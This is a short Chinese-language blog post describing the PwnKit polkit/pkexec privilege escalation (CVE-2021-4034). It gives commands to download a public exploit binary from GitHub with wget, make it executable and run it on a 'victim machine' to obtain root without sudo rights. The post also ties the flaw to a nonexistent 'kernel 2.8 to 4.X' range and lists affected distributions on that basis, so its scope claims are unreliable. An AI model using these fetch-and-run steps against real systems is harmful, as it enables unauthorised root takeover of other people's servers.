cyber kill chain手法

[提權]PwnKit,可以讓一般使用者輕鬆變成 Root

一項被隱藏12年的Linux漏洞PwnKit,能讓攻擊者取得幾乎所有Linux平台伺服器上的root權限。原稱為PolicyKit的Polkit是用以管理源自Unix的OS的系統權限,讓非特殊權限的行程可和特殊權限的行程安全通訊,也讓使用者利用名為pkexec的元件下達特殊權限的指令。

安全廠商於去年11發現PwnKit,而在主要Linux發行版修補完成後,於本周公佈。本項漏洞編號CVE-2021-4034,CVSS 3.0風險值7.8。2009 後的版本就內建此安全性問題

只要linux kernal版本介於2.8~4.X之間的都可以這樣提權,所以包含了

  • ubuntu 11.10到18.10等版本
  • Fedora 16~29版本
  • Redhat 7-8

,且縱使你的使用者沒有sudo root的權限也可以使用,因為他就是直接切換成root帳號去了

你可以在github ly4k/PwnKit 這邊找到相關的檔案及介紹

操作方法如下

#先下載檔案,你也可以先抓好在傳過去你的受害機
wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
chmod +x PwnKit
./PwnKit

我會改用wget的原因是,部分系統沒有內建curl 還要另外再安裝(他不是內建的),上面可以看到我先sudo過會提示目前這個帳號是沒有root的權限的,當我下載完pwnkit執行完畢後,就拿到root權限了

Be the First to comment.

Leave a Comment

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

(若看不到驗證碼,請重新整理網頁。)